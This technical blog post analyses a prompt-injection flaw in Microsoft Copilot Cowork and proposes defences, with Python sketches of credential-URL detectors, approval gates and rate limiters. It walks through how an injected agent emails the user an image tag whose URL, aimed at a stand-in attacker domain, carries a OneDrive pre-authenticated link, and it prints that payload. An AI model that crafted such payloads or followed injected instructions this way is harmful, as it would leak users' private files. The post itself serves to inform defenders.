Microsoft Copilot Cowork shipped with a vulnerability that turns agent-to-user notifications into a data exfiltration channel. The attack surface is not the tool call itself but the rendering context where the agent’s output appears.
The vulnerability combines three architectural decisions:
- Agents can send emails to the user’s inbox without approval
- Those emails render external images that trigger network requests
- OneDrive pre-authenticated download links can be embedded in the message body
When a prompt injection succeeds, the agent generates an email containing an image tag pointing to an attacker-controlled domain. The URL includes a OneDrive pre-authenticated link as a query parameter. When the user opens the email, their mail client fetches the image and leaks the file access token to the attacker.
This is not a theoretical attack. It affected a shipping enterprise product.
The Lethal Trifecta in Production
Simon Willison calls the underlying pattern the “lethal trifecta”: access to private data, exposure to untrusted content, and the ability to communicate externally. Most agent security writing looks for the third leg in the agent’s tool calls. Here the display layer supplies it, and that is where the exfiltration actually happens.
The flow:
- Attacker injects a prompt via a document, email, or web page the agent processes
- Agent generates a message with embedded external image:
  <img src="https://attacker.com/log?token=https://onedrive.live.com/download?cid=ABC123&authkey=XYZ">
- Agent calls the “send email to user” tool (no approval required)
- User opens email in Outlook or webmail
- Mail client fetches the image, sending the OneDrive token to the attacker
- Attacker downloads the file using the leaked pre-authenticated link
The agent never directly calls a “send file to external server” tool. It uses an approved notification channel and relies on the email client’s rendering behavior to complete the exfiltration.
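To make the leak concrete, here is a minimal sketch of what the image host receives when the mail client fetches the URL from the flow above. The helper name `attacker_view` is hypothetical. The second URL assumes an attacker who percent-encodes the link, which the original example does not do.

```python
from urllib.parse import parse_qs, quote, urlsplit


def attacker_view(image_url: str) -> dict[str, list[str]]:
    """Return the query parameters the image host sees on a plain GET."""
    return parse_qs(urlsplit(image_url).query)


# The URL exactly as it appears in the flow above (inner link not encoded).
raw = "https://attacker.com/log?token=https://onedrive.live.com/download?cid=ABC123&authkey=XYZ"

# Assumption: a more careful attacker percent-encodes the inner link.
link = "https://onedrive.live.com/download?cid=ABC123&authkey=XYZ"
encoded = "https://attacker.com/log?token=" + quote(link, safe="")

print(attacker_view(raw))      # the link arrives split across two parameters
print(attacker_view(encoded))  # the link arrives intact in "token"
```

Either way the full pre-authenticated link ends up in the attacker's request log. No script runs in the mail client; one image fetch is enough.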
Permission Boundary Confusion
The core failure is treating “notify user” and “act on behalf of user” as the same permission tier.
Agents typically have three communication modes:
| Mode | Approval | Rendering | Exfiltration Risk |
|---|---|---|---|
| Internal response | None | Sandboxed UI | Low (if sandbox enforces CSP) |
| Notification to user | None | Full email/Slack rendering | High (external images, links) |
| Outbound message | Required | N/A (user reviews before send) | Low (user sees content) |
Copilot Cowork treated mode 2 like mode 1. The agent could send emails without approval because they were “just notifications.” But those notifications rendered in a full email client with external resource loading enabled.
The fix requires at least one of:
- Sandboxing agent-generated emails (strip external images, disable link previews)
- Requiring approval for any message that leaves the agent’s controlled UI
- Treating “send email to user” as equivalent to “send email on behalf of user”
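One way to encode the third option is to decide approval by where the message renders, not by who receives it. The sketch below is an illustration under that assumption. The `Channel` names and the `CONTROLLED_CHANNELS` set are hypothetical and not taken from any Copilot API.

```python
from enum import Enum


class Channel(Enum):
    AGENT_UI = "agent_ui"                # sandboxed UI the product controls
    EMAIL_TO_USER = "email_to_user"      # "just a notification"
    EMAIL_ON_BEHALF = "email_on_behalf"  # outbound message to third parties


# Only channels whose rendering context you control may skip approval.
CONTROLLED_CHANNELS = {Channel.AGENT_UI}


def requires_approval(channel: Channel) -> bool:
    """Approval depends on the rendering context, not on the recipient."""
    return channel not in CONTROLLED_CHANNELS
```

Under this policy `EMAIL_TO_USER` and `EMAIL_ON_BEHALF` fall into the same tier, which is the boundary the vulnerable design blurred.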
Pre-Authenticated Links as Exfiltration Primitives
OneDrive and SharePoint generate pre-authenticated download links for sharing. These tokens are bearer credentials: anyone with the URL can download the file.
An exfiltration path exists whenever an agent has permission to:
- Read files from OneDrive
- Generate sharing links
- Send messages to external channels
The agent doesn’t need to upload the file anywhere. It just needs to generate a link and send it somewhere the attacker can observe.
This applies to any cloud storage with pre-authenticated URLs:
- AWS S3 presigned URLs
- Google Cloud Storage signed URLs
- Azure Blob Storage SAS tokens
- Dropbox shared links
The mitigation is not to block link generation. It’s to ensure that any action that creates a bearer credential and transmits it outside the agent’s sandbox requires explicit user approval.
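A gate like that needs some way to notice bearer credentials in outbound content. The following is a rough sketch and not a complete detector. `CREDENTIAL_PARAMS` is an illustrative, incomplete list: `X-Amz-Signature`, `X-Goog-Signature`, and `sig` are the signature parameters used by S3 presigned URLs, GCS signed URLs, and Azure SAS tokens, and `authkey` comes from the OneDrive example above. Both function names are hypothetical.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Illustrative and incomplete; "sig" in particular will produce false positives.
CREDENTIAL_PARAMS = {"x-amz-signature", "x-goog-signature", "sig", "authkey"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def carries_credential(url: str) -> bool:
    """True if the URL, or a URL nested in its query string, has a signing parameter."""
    for key, value in parse_qsl(urlsplit(url).query):
        if key.lower() in CREDENTIAL_PARAMS:
            return True
        # parse_qsl has already percent-decoded the value, so nested links are visible.
        if value.startswith(("http://", "https://")) and carries_credential(value):
            return True
    return False


def find_credential_urls(text: str) -> list[str]:
    """Return every URL in an outbound message that appears to embed a bearer credential."""
    candidates = URL_RE.findall(html.unescape(text))
    return [url for url in candidates if carries_credential(url)]
```

Any non-empty result from `find_credential_urls` would route the message to an approval step. It would not block link generation itself.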
Rendering Context as Attack Surface
Email clients are designed to render rich content. That means:
- External images load automatically (unless user has disabled them)
- Link previews fetch metadata from target URLs
- Tracking pixels are standard practice
- CSS can trigger network requests via url() references
When you display agent-generated content in an email client, you inherit all of these behaviors. The agent doesn’t need to exploit a vulnerability in the email client. It just needs to use standard HTML features.
The same risk exists for:
- Slack messages (link previews, image embeds)
- Microsoft Teams (similar rendering)
- Browser notifications (if they allow rich content)
- Mobile push notifications (if they fetch images)
If your agent can send content to any of these channels without approval, and that content can reference external resources, you have an exfiltration vector.
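To check whether a given message falls into this category, you can list the URLs a rich renderer would likely fetch without any click. This sketch uses only the Python standard library. The `AUTO_FETCH_ATTRS` set is an assumption and far from exhaustive, and real clients differ in what they load automatically.

```python
import re
from html.parser import HTMLParser

CSS_URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.IGNORECASE)
# (tag, attribute) pairs that many renderers fetch on display. Illustrative only.
AUTO_FETCH_ATTRS = {("img", "src"), ("link", "href"), ("video", "poster")}


class FetchCollector(HTMLParser):
    """Collects URLs from auto-loading attributes and from CSS url() references."""

    def __init__(self) -> None:
        super().__init__()
        self.urls: list[str] = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
        for name, value in attrs:
            if value is None:
                continue
            if (tag, name) in AUTO_FETCH_ATTRS:
                self.urls.append(value)
            elif name == "style":  # inline style attribute
                self.urls.extend(CSS_URL_RE.findall(value))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:  # contents of a <style> element
            self.urls.extend(CSS_URL_RE.findall(data))


def auto_fetched_urls(markup: str) -> list[str]:
    collector = FetchCollector()
    collector.feed(markup)
    collector.close()
    return collector.urls
```

If `auto_fetched_urls` returns anything for an agent-generated message, displaying that message can cause network requests the user never asked for.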
Approval Flow Patterns
The fix is to distinguish between:
- Display to user in controlled context: Agent UI, sandboxed iframe, CSP-enforced page
- Transmit to user via external channel: Email, Slack, SMS, push notification
For the second category, you need approval before the message leaves your infrastructure. The approval UI should:
- Show the full message content including all links and image URLs
- Highlight any external domains referenced
- Display any file access tokens or credentials embedded in the content
- Require explicit confirmation before sending
This is expensive in terms of user friction. But the alternative is treating every notification channel as a potential data leak.
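A minimal sketch of such an approval step might look like the following. Every name here (`ApprovalRequest`, `build_approval_request`, `send_if_approved`, `trusted_domains`) is hypothetical, the `send` callable stands in for whatever transport you use, and credential highlighting is left out for brevity.

```python
import re
from dataclasses import dataclass, field
from typing import Callable
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


@dataclass
class ApprovalRequest:
    channel: str
    body: str  # shown to the user in full, including raw URLs
    external_domains: list[str] = field(default_factory=list)  # highlighted in the UI


def build_approval_request(channel: str, body: str, trusted_domains: set[str]) -> ApprovalRequest:
    """Collect every untrusted host referenced in the message so the UI can flag it."""
    domains: list[str] = []
    for url in URL_RE.findall(body):
        host = urlsplit(url).hostname
        if host and host not in trusted_domains and host not in domains:
            domains.append(host)
    return ApprovalRequest(channel, body, domains)


def send_if_approved(request: ApprovalRequest, approved: bool,
                     send: Callable[[str, str], None]) -> bool:
    """Nothing leaves your infrastructure unless the user explicitly confirmed."""
    if not approved:
        return False
    send(request.channel, request.body)
    return True
```

The point of the design is that `send` is reachable only through `send_if_approved`, so the agent has no path to an external channel that skips the review.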
Implementation Checklist
If you’re building an agent that can send messages:
- Sandbox agent responses: Use CSP to block external resources in your UI
- Strip external content: Remove <img>, <link>, <script> tags from agent-generated messages before displaying them
- Require approval for external channels: Treat email, Slack, SMS as high-privilege actions
- Audit pre-authenticated link generation: Log every time an agent creates a sharing link or presigned URL
- Monitor outbound requests: Alert when agent-generated content triggers external network requests
- Rate-limit notifications: Cap how many emails/messages an agent can send per hour
The last point matters because even with approval, a compromised agent can spam the user with approval requests until they click through without reading.
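For the rate-limit item, a sliding-window counter is usually enough. The class below is a sketch, not a production limiter. The name `NotificationLimiter` and the injectable `clock` parameter are assumptions made so the behavior can be tested without waiting an hour.

```python
import time
from collections import deque
from typing import Callable

WINDOW_SECONDS = 3600


class NotificationLimiter:
    """Allows at most max_per_hour notifications in any rolling one-hour window."""

    def __init__(self, max_per_hour: int, clock: Callable[[], float] = time.monotonic) -> None:
        self.max_per_hour = max_per_hour
        self.clock = clock
        self._sent: deque[float] = deque()  # timestamps of allowed sends, oldest first

    def allow(self) -> bool:
        now = self.clock()
        # Drop timestamps that have aged out of the window.
        while self._sent and now - self._sent[0] >= WINDOW_SECONDS:
            self._sent.popleft()
        if len(self._sent) >= self.max_per_hour:
            return False
        self._sent.append(now)
        return True
```

Applying the same limiter to approval requests, not only to delivered messages, is what addresses the approval-fatigue problem described above.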
Technical Verdict
Use agent-to-user notifications when:
- Messages render in a sandboxed UI you control
- External resources are blocked by CSP
- The agent cannot generate bearer credentials (pre-authenticated links)
Require approval when:
- Messages render in email clients, Slack, or other external channels
- Content may include external images or links
- The agent has permission to generate file sharing links
Avoid entirely when:
- You cannot sandbox the rendering context
- The agent has broad file access and can generate pre-authenticated URLs
- User approval flows are not practical for your use case
The Copilot Cowork vulnerability shows that even major vendors get this wrong. The attack surface is not just the tools you give the agent. It’s also where the agent’s output gets displayed and what network requests that display context will make on behalf of the user.
Source Links
- Microsoft Copilot Cowork Exfiltrates Files (Simon Willison)